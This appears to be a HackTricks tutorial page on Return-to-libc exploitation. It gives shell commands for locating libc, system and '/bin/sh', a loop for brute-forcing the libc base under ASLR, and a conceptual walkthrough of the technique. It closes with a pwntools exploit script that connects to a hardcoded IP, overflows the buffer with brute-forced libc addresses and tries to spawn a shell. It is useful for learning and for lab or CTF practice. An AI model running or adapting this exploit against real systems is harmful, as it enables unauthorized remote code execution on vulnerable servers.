
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong></strong></summary>
Other ways to support HackTricks:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF**, check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
**If you have found a vulnerable binary and think you can exploit it with Ret2Lib, here are some basic steps you can follow.**
# If you are **inside the host**
## You can find the **address of the libc library**
```bash
ldd /path/to/executable | grep libc.so.6 # Address (with ASLR this changes on every run)
```
If you want to check whether ASLR is changing the address of libc, you can run:
```bash
for i in `seq 0 20`; do ldd <executable> | grep libc; done
```
## Get the offset of the system function
```bash
readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system
```
## Get the offset of "/bin/sh"
```bash
strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh
```
## /proc/\<PID>/maps
If the process creates **child processes** every time you talk to it (a network server), try to **read** that file (you will probably need root).
Here you can find **exactly where libc is loaded** inside the process and **where it will be loaded** for every child of the process.
![](<../../.gitbook/assets/image (95).png>)
In this case it is loaded at **0xb75dc000** (this is the base address of libc).
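As an added example (not code from the original page), here is a small Python helper that automates the two checks above: it parses `/proc/<pid>/maps` text to find the libc base (the mapping of libc with file offset 0), adds a `readelf`/`strings` offset to it, and compares bases observed over several runs to report whether ASLR is really randomizing libc. The maps text below is a constructed sample whose base matches the value above; `read_maps` and the other function names are assumptions of this example.

```python
import re

# Constructed sample of /proc/<pid>/maps output (not captured from a real
# process); the libc base 0xb75dc000 matches the value discussed above.
SAMPLE_MAPS = """\
08048000-08049000 r-xp 00000000 08:01 131 /home/user/vuln
08049000-0804a000 rw-p 00000000 08:01 131 /home/user/vuln
b75db000-b75dc000 rw-p 00000000 00:00 0
b75dc000-b7726000 r-xp 00000000 08:01 393232 /lib/i386-linux-gnu/libc.so.6
b7726000-b7727000 ---p 0014a000 08:01 393232 /lib/i386-linux-gnu/libc.so.6
b7727000-b7729000 r--p 0014a000 08:01 393232 /lib/i386-linux-gnu/libc.so.6
b7729000-b772a000 rw-p 0014c000 08:01 393232 /lib/i386-linux-gnu/libc.so.6
bfe8a000-bfeab000 rw-p 00000000 00:00 0 [stack]
"""

# start-end perms offset dev inode [pathname]
MAPS_LINE = re.compile(
    r"^([0-9a-f]+)-([0-9a-f]+)\s+(\S{4})\s+([0-9a-f]+)\s+\S+\s+\d+\s*(.*)$"
)
# Matches both naming schemes: libc.so.6 and libc-2.27.so
LIBC_PATH = re.compile(r"/libc(\.so|-\d)")


def libc_base(maps_text):
    """Load address of libc: the libc mapping whose file offset is 0
    (the first page of the ELF). Returns None if libc is not mapped."""
    for line in maps_text.splitlines():
        m = MAPS_LINE.match(line)
        if not m:
            continue
        start, _end, _perms, offset, path = m.groups()
        if LIBC_PATH.search(path) and int(offset, 16) == 0:
            return int(start, 16)
    return None


def symbol_address(base, offset):
    """Absolute address of a libc symbol/string from its readelf or strings offset."""
    return base + offset


def aslr_randomizes(bases):
    """Given libc bases seen over several runs (cf. the ldd loop above),
    report whether they differ, i.e. whether ASLR is effective for libc."""
    return len(set(bases)) > 1


def read_maps(pid):
    """Read the maps of a live process (needs ptrace/root access, as noted above)."""
    with open(f"/proc/{pid}/maps") as f:
        return f.read()
```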
## Using gdb-peda
With gdb-peda you can get the addresses of the **system** function, the **exit** function and the string **"/bin/sh"**:
```
p system
p exit
find "/bin/sh"
```
# Bypassing ASLR
You can try to brute force the base address of libc.
```python
# One page-aligned candidate libc base per iteration, across the 32-bit mmap region
for off in range(0xb7000000, 0xb8000000, 0x1000):
    print(hex(off))  # candidate base to try
```
# Code
## Ret2Lib
### Introduction
In this section, we will cover the basics of Return-to-libc (Ret2Lib) attacks. These attacks are a variation of Return Oriented Programming (ROP) attacks, where instead of chaining together small code snippets (gadgets) already present in the program, we chain together function calls from the standard C library (`libc`). This technique is useful when Data Execution Prevention (DEP) is enabled, preventing the execution of code on the stack.
### Steps
1. **Find `libc` Address**: The first step is to find the address of the `libc` library in the program's memory space. This can be done by leaking addresses or using techniques like Partial Overwrite.
2. **Find Function Addresses**: Next, we need to find the addresses of the functions we want to call from `libc`, and of any strings they need. Common targets in Ret2Lib attacks include `system`, `execve`, `exit`, and the `/bin/sh` string, etc.
3. **Craft Payload**: Craft a payload that chains together the addresses of the functions in `libc` that you want to call. This payload will overwrite the return address on the stack with the address of the first function to call.
4. **Exploit**: Finally, trigger the vulnerability in the program to execute the crafted payload. This will lead to the execution of the functions from `libc` as part of the attack.
### Conclusion
Return-to-libc attacks are a powerful technique to bypass DEP and execute code from the `libc` library. By chaining together function calls, attackers can achieve their malicious goals without needing to inject code into the program's memory space.
```python
from pwn import *

c = remote('192.168.85.181', 20002)
c.recvline()  # Banner

# Try every page-aligned candidate libc base in the 32-bit mmap region
for off in range(0xb7000000, 0xb8000000, 0x1000):
    p = b""
    p += p32(off + 0x0003cb20)  # system
    p += b"CCCC"                # GARBAGE (return address after system)
    p += p32(off + 0x001388da)  # "/bin/sh"
    payload = b'A' * 0x20010 + p  # padding up to the saved return address
    c.send(payload)
c.interactive()  # ?
```